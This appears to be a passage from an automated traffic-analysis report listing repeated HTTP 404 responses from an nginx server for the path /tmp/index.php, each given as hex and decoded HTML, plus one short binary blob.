                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx/1.26.0
                    Date: Mon, 07 Oct 2024 12:59:31 GMT
                    Content-Type: text/html; charset=utf-8
                    Connection: close
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx/1.26.0
                    Date: Mon, 07 Oct 2024 12:59:32 GMT
                    Content-Type: text/html; charset=utf-8
                    Connection: close
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx/1.26.0
                    Date: Mon, 07 Oct 2024 12:59:33 GMT
                    Content-Type: text/html; charset=utf-8
                    Connection: close
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx/1.26.0
                    Date: Mon, 07 Oct 2024 12:59:34 GMT
                    Content-Type: text/html; charset=utf-8
                    Connection: close
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
                    Server: nginx/1.26.0
                    Date: Mon, 07 Oct 2024 12:59:35 GMT
                    Content-Type: text/html; charset=utf-8
                    Connection: close
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:45 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 07 Oct 2024 12:59:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
